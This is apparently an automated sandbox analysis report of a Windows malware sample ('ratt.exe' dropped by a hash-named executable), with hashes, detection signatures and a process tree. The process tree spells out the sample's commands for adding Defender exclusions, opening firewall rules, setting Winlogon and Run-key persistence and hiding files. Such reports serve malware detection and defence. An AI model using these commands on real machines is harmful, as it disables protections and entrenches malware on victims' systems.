Analysis
-
max time kernel
51s -
max time network
107s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
24/08/2023, 23:34
Static task
static1
General
-
Target
2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe
-
Size
1.4MB
-
MD5
ffb7023271ac48cf51433fd12a3dd83b
-
SHA1
87492725d1d61b7498bd68939b5bda532a8659df
-
SHA256
2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225
-
SHA512
4d1a50b3494736ef526f2efc4d0dc337a30c13ecb833dc63de3a73ec650439fad8ddf3ce42b9a3654741b122d498d6b5470c1cf621428ac0bfe25d3e079d44a2
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2840 netsh.exe 4700 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000700000001b009-132.dat acprotect behavioral1/files/0x000700000001b009-131.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 224 7z.exe -
Loads dropped DLL 1 IoCs
pid Process 224 7z.exe -
resource yara_rule behavioral1/files/0x000700000001b00c-128.dat upx behavioral1/files/0x000700000001b00c-130.dat upx behavioral1/memory/224-129-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/files/0x000700000001b009-132.dat upx behavioral1/files/0x000700000001b009-131.dat upx behavioral1/memory/224-133-0x0000000010000000-0x00000000100E2000-memory.dmp upx behavioral1/memory/224-137-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4396 PING.EXE 1656 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4440 powershell.exe 4440 powershell.exe 4440 powershell.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 4568 powershell.exe 4568 powershell.exe 4568 powershell.exe 1796 powershell.exe 1796 powershell.exe 1796 powershell.exe 4280 powershell.exe 4280 powershell.exe 4280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2596 WMIC.exe Token: SeSecurityPrivilege 2596 WMIC.exe Token: SeTakeOwnershipPrivilege 2596 WMIC.exe Token: SeLoadDriverPrivilege 2596 WMIC.exe Token: SeSystemProfilePrivilege 2596 WMIC.exe Token: SeSystemtimePrivilege 2596 WMIC.exe Token: SeProfSingleProcessPrivilege 2596 WMIC.exe Token: SeIncBasePriorityPrivilege 2596 WMIC.exe Token: SeCreatePagefilePrivilege 2596 WMIC.exe Token: SeBackupPrivilege 2596 WMIC.exe Token: SeRestorePrivilege 2596 WMIC.exe Token: SeShutdownPrivilege 2596 WMIC.exe Token: SeDebugPrivilege 2596 WMIC.exe Token: SeSystemEnvironmentPrivilege 2596 WMIC.exe Token: SeRemoteShutdownPrivilege 2596 WMIC.exe Token: SeUndockPrivilege 2596 WMIC.exe Token: SeManageVolumePrivilege 2596 WMIC.exe Token: 33 2596 WMIC.exe Token: 34 2596 WMIC.exe Token: 35 2596 WMIC.exe Token: 36 2596 WMIC.exe Token: SeIncreaseQuotaPrivilege 2596 WMIC.exe Token: SeSecurityPrivilege 2596 WMIC.exe Token: SeTakeOwnershipPrivilege 2596 WMIC.exe Token: SeLoadDriverPrivilege 2596 WMIC.exe Token: SeSystemProfilePrivilege 2596 WMIC.exe Token: SeSystemtimePrivilege 2596 WMIC.exe Token: SeProfSingleProcessPrivilege 2596 WMIC.exe Token: SeIncBasePriorityPrivilege 2596 WMIC.exe Token: SeCreatePagefilePrivilege 2596 WMIC.exe Token: SeBackupPrivilege 2596 WMIC.exe Token: SeRestorePrivilege 2596 WMIC.exe Token: SeShutdownPrivilege 2596 WMIC.exe Token: SeDebugPrivilege 2596 WMIC.exe Token: SeSystemEnvironmentPrivilege 2596 WMIC.exe Token: SeRemoteShutdownPrivilege 2596 WMIC.exe Token: SeUndockPrivilege 2596 WMIC.exe Token: SeManageVolumePrivilege 2596 WMIC.exe Token: 33 2596 WMIC.exe Token: 34 2596 WMIC.exe Token: 35 2596 WMIC.exe Token: 36 2596 WMIC.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 380 wrote to memory of 2980 380 2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe 70 PID 380 wrote to memory of 2980 380 2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe 70 PID 380 wrote to memory of 2980 380 2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe 70 PID 2980 wrote to memory of 4556 2980 cmd.exe 73 PID 2980 wrote to memory of 4556 2980 cmd.exe 73 PID 2980 wrote to memory of 4556 2980 cmd.exe 73 PID 4556 wrote to memory of 4404 4556 cmd.exe 74 PID 4556 wrote to memory of 4404 4556 cmd.exe 74 PID 4556 wrote to memory of 4404 4556 cmd.exe 74 PID 2980 wrote to memory of 3340 2980 cmd.exe 75 PID 2980 wrote to memory of 3340 2980 cmd.exe 75 PID 2980 wrote to memory of 3340 2980 cmd.exe 75 PID 3340 wrote to memory of 2596 3340 cmd.exe 76 PID 3340 wrote to memory of 2596 3340 cmd.exe 76 PID 3340 wrote to memory of 2596 3340 cmd.exe 76 PID 2980 wrote to memory of 4440 2980 cmd.exe 78 PID 2980 wrote to memory of 4440 2980 cmd.exe 78 PID 2980 wrote to memory of 4440 2980 cmd.exe 78 PID 2980 wrote to memory of 4680 2980 cmd.exe 79 PID 2980 wrote to memory of 4680 2980 cmd.exe 79 PID 2980 wrote to memory of 4680 2980 cmd.exe 79 PID 2980 wrote to memory of 5044 2980 cmd.exe 80 PID 2980 wrote to memory of 5044 2980 cmd.exe 80 PID 2980 wrote to memory of 5044 2980 cmd.exe 80 PID 2980 wrote to memory of 4568 2980 cmd.exe 81 PID 2980 wrote to memory of 4568 2980 cmd.exe 81 PID 2980 wrote to memory of 4568 2980 cmd.exe 81 PID 2980 wrote to memory of 1796 2980 cmd.exe 82 PID 2980 wrote to memory of 1796 2980 cmd.exe 82 PID 2980 wrote to memory of 1796 2980 cmd.exe 82 PID 2980 wrote to memory of 224 2980 cmd.exe 83 PID 2980 wrote to memory of 224 2980 cmd.exe 83 PID 2980 wrote to memory of 224 2980 cmd.exe 83 PID 2980 wrote to memory of 4280 2980 cmd.exe 84 PID 2980 wrote to memory of 4280 2980 cmd.exe 84 PID 2980 wrote to memory of 4280 2980 cmd.exe 84 PID 4280 wrote to memory of 4700 4280 powershell.exe 85 PID 4280 wrote to memory of 4700 4280 powershell.exe 85 PID 4280 wrote to memory of 4700 4280 powershell.exe 85 PID 4280 wrote to memory of 2840 4280 powershell.exe 86 PID 4280 wrote to memory of 2840 4280 powershell.exe 86 PID 4280 wrote to memory of 2840 4280 powershell.exe 86 PID 4280 wrote to memory of 2184 4280 powershell.exe 87 PID 4280 wrote to memory of 2184 4280 powershell.exe 87 PID 4280 wrote to memory of 2184 4280 powershell.exe 87 PID 2184 wrote to memory of 3036 2184 cmd.exe 88 PID 2184 wrote to memory of 3036 2184 cmd.exe 88 PID 2184 wrote to memory of 3036 2184 cmd.exe 88 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2364 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe"C:\Users\Admin\AppData\Local\Temp\2fbd6511926c2fe0f365eddc0dfaeea0967d707922b6cf8458d252a2388d1225.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4700
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="GGEPMLAP" set AutomaticManagedPagefile=False5⤵PID:3036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:4808
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵PID:4012
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵PID:4076
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵PID:4864
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 86⤵
- Runs ping.exe
PID:4396
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 15 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 15 > nul && "C:\Users\Admin\Music\rot.exe"5⤵PID:2876
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 156⤵
- Runs ping.exe
PID:1656
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
PID:2364
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵PID:3944
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵PID:2912
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
509.1MB
MD55f21a05e2825546808876db827d585f0
SHA1de269e3cac878a5f37d3fff7123362ec83f5c16b
SHA256038eb23df0c810699b46075f2841254fb31d5e5ec2764b3ca4db8b18ac0ed292
SHA512ae9c150ab1dfd14df34814ffdcd3fa4c91fccf729b933e08f1813637caa699f27b1f3c4644dcb4315ddb546497d419915e48c6dfcb25c34671c91af50a4188b8
-
Filesize
430.4MB
MD5ef067df0bba84a90b5bf7c46698d0078
SHA124d3f1483a4a4a180be5ab8be9edda5c3c8f8933
SHA2564911ae3c437c74f0b3a590d423381a3e47c4f6c9e6208bad2123aec7435e1cfa
SHA512124e0999c79ed2bcc5a9bdb5a69c6c8c8422abf7aa3afcf4fa5443ac1c8a000b5804c73a4f9663c6f802585ffbb41e1aff3982ce68003f927bca2f401755aa22
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
12KB
MD528ccbc8c3c86b7d970727be772527889
SHA12d6be10b5bb529d13e40b445d55aa02c19c28098
SHA25616e896e421c9acc856e1b71d2128bb7851cae15d4c36ec35312cbaea8958ead8
SHA51295561fe1d096cc705a55541fd8d134f1943df78ac5f15a08116e1921fdcdfea40e2920d6f3a0d9d99442b7ad1c8a475cb93f20006b0bde2ab594125bb7a14a98
-
Filesize
12KB
MD50bd7011dc9e790b743fe54c89e000e0b
SHA1133ca0ac3402915beb9edfae0d4db2b52c6a8162
SHA2567f52aa442af49d70dd9acdbcf916731276b2a3f3f0b641806efcde772af5d493
SHA51247ae3774554dd39cdcd61345d6a0786091352ac8e6bb7930aef436317e27d308d83ac0498b1107e654bcae5da2fd302d2faff826572235e744ae6e865a0c971b
-
Filesize
12KB
MD588d1dfc3ae72dc974229748b4f886572
SHA13714a3bd807488431fd73f919c439d601b1d0ac5
SHA2565495f2e67616b3469e3637c07beb71968fa03ae9601ac245db2ff2e3bb5029a8
SHA512480f12732d34b896ef6758e48d630b1cf903b606b49531f0639ff192cb73ee8c12b09e114751f8efc6c72f548972bdadc747a2440a680e41be46727f89adc741
-
Filesize
12KB
MD56256b7486ffc554c181e03f823d9ff33
SHA13664e8d43aaa4ff2e3761db4dae63f5e3db50b8e
SHA25638078b23904083ef37088fc19166ab2adb9264d55703d8ae93aff072ac21547f
SHA5127646f04fc2caf6d7815449d0575b450d68a57675c15d543cbfa827073d8acf02f468dcbf57ba41f067e8fcef73985df6d737ab33c9f1d36390f0be6e386de5a5
-
Filesize
12KB
MD501d088ebe4bba3986ebcfee3509463ce
SHA17c0f9d5df46fc07ecddd376110a41087bb2d8eea
SHA256e8729804eb7fe5a5d6ce4dc3b15e91703b9a6dd108f09af4267cd85aebbc5340
SHA512518fdd6aafe5b8d39d69d0b8c56f5a567c8c0209890ddb3b1ad5a17fe5b6f085532a4e22136453824b306b87d57f44b4b8b5c4c72dda170a333c7f02b9da5d1c
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
405.6MB
MD5db50653544117d76aca2b04df67a1e81
SHA1e5e9c59b69f493d08756948e5112d39b90bfd79b
SHA256d8e03e9ac9b5fc0b31f0a147555439af58d0d153c34d128af081cfaa18d37acc
SHA512708b5a9c7235bc7d831e8aafdecd7d42894bb527b63a0a73de1ff2b7c822a178c9d0eff450f88b058b5e17f0a30ac4ad686a3272012daead9444d4bc4bb286be
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287